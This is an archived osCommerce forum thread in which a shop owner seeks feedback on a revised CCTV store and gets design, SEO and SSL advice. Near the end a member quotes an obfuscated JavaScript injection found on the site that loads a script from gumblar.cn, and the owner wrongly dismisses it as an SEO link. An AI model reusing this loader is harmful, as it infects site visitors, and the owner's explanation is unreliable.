• Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Revised Store needs help

Deluxecctv

Hello fellow forum readers,

We just got done revising our website and making a lot of changes to it. We would greatly appreciate your feedback on what we can do to improve it further. If for some reason you get an error message while attempting to access our website, this is because we are currently moving the website to a more secure server. Please be patient and check back later. Thanks

Here is the website Visit My Website

80 people have looked at my thread and no one has replied? Anybody? I thought this was supposed to be a friendly site to get honest information to help. Please someone reply.

Dustin,

Your site looks fine. Since it's a template I am not sure what you could have done to change the layout. The only thing I can see is new products added, which really doesn't require a review and would be considered more of a sales pitch than anything.

Anyway, the site looks fine.

Chris

• 2 weeks later...
Looks professional,

How did you get the sidebar like that? - I like

How can I change mine?

Hello, I had my web developer do all the work for me. I just wanted a certain look and went after it. Thanks for the feedback, and any other feedback is more than welcome. Thanks again!

• 2 weeks later...

Your site looks quite good. If i was you, i would take no ctisism as a bonus. leave it alone.

The only thing i would remove from your site is the "this product was added to our catalog" text on your product info pages. As a customer, why do i need to know this.

What i would add, if i wanted to be taken seriously is SSL. No sensible person will purchase any items without it. I would also try to make the small images clearer, they look a bit fuzzy. Some of your product images, once clicked to enlaorge are still small.

Once all that is done, it looks as if you need to add something to help with SEO. Every one of your products have the same metta info.

REMEMBER BACKUP, BACKUP AND BACKUP

design is kind of old...colors don't match..the post it note is pixelated

the product info page ...review and buy now buttons don't match and also the background behind them is bad

turoreakandy, what would you doing suggest? Compared to all the other websites out there, this looks like a great website stated by several people. I appreciate the criticism, but what do you suggest I do about it? Thanks

I'd say it looks very "osCommercey".

If it were me I'd be

1. looking at restyling your infoboxes so they don't look like boxes anymore

2. making sure that your product descriptions have "style" (check in firefox)

It's certainly nicer than 90% of osCommerce sites. It jsut needs an injection of style.

If it were me I'd be

It's certainly nicer than 90% of osCommerce sites. It jsut needs an injection of style.

Thanks for comment.

Where will I do the infobox thing and fix for Firefox? (I like Firefox)

Getting the Phoenix off the ground

If it were me I'd be

Thanks, I will be making a lot more changes coming up here in the future. Thanks for your help.

Here's my $0.02....

1. Install Easy SEO or Ultimate SEO URLS. This iwll change your dynamic addresses to more Google-friendly ones.

2. Change the logos at teh bottom. "HackerSafe" is bigger than your product images! Which is more important - your products or their logo?

3. Change your default icons. For example (http://www.deluxecctv.com/catalog/images/box_products_notifications.gif) is a stock icon. Change to match the rest of your site (wwhich looks good)

4. Install SlimBox or Lightbox on your image previews. This will open a large animated window for your preview. Very nice.

5. You are using a scaled image for your products. Install a contribution that allows you to have two images. 1 will be a small preview - the other can be any size.

This will stop your images from looking distorted on the main site pages.

6. Your product descriptions have lists that are unordered and unbulletted. Use HTML tags, or install a WYSIWYG editor for your product descriptions.

7. SSL - well done! You'd be amazed how many stores don't have this!

8. Revise your column widths. At the moment, your left and right columns are fixed width, with teh centre expanding.

I'm on a large monitor (1980px) and the left and right columns are virtually missing from my screen because the centre is so large.

On the payment page, you have a lot of info about ordering errors etc. But on my screen this is almost lost.

Set your widths to something like 15% 70% 15%, with a minimum width attribute for teh L&R columns, so that it still scales on smaler resolutions.

9. Install Header Tags for SEO. Allows you to add descriptions, page titles and keywords to your meta tags for each product. Very handy.

10. Some of your javascript executes when the page opens. If you script doesn't need to be in your HEAD section, move it to the end of the page.

This will improve your page load speed marginally, as javascript is "fired" before the rest of the page loads.

That should get you started.

Datamouse, thank you so much. Your information was very helpful. I will be making more changes here in the next couple of weeks. Please check back to see the work. Thanks again!

• 2 weeks later...
  • 3 weeks later...

I think you've been hacked....

<script language=javascript><!-- 
(function(){var xLmE='%';var mef='@76ar@20@61@3d@22Scrip@74@45ngin@65@22@2cb@3d@22Version()+@22@2cj@3d@22@22@2cu@3dnaviga@74or@2eus@65rAg@65@6et@3bif(@28u@2einde@78O@66(@22Win@22@29@3e@30@29@26@26(@75@2eindex@4ff(@22NT@206@22)@3c@30)@26@26(docu@6den@74@2e@63ookie@2eind@65xO@66(@22@6diek@3d1@22)@3c@30)@26@26@28typ@65o@66@28z@72vzts)@21@3dt@79pe@6ff(@22@41@22@29))@7bzrv@7ats@3d@22A@22@3beva@6c@28@22if(w@69nd@6fw@2e@22+a+@22@29j@3d@6a@2b@22+a+@22Major@22+@62@2ba@2b@22Min@6fr@22
@2bb+@61+@22Build@22+@62+@22j@3b@22)@3bdo@63u@6dent@2ewr@69te(@22@3c@73@63r@69pt@20src@3d@2f@2fgumblar@2e@63n@2f@72ss@2f@3fi@64@3d@22+j@2b
@22@3e@3c@5c@2fsc@72@69pt@3e@22)@3b@7d';var x9t6B=mef.replace(/@/g,xLmE);var gJez=unescape(x9t6B);eval(gJez)})();
--></script>

:o

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

"Headers already sent" - The definitive help

"Cannot redeclare ..." - How to find/fix it

SSL Implementation Help

Like this post? "Like" it again over there >

Ok, most of the work has been completed. Please take a look and see what you think. Any comments are appriciated. Thanks Visit My Website

No, what had happen is our SEO guys did user friendly URL'S and they used an outbound link. So it reads it as malicious code. We are working around the clock to get this fixed. Thanks and we will let you know when to check back.

Archived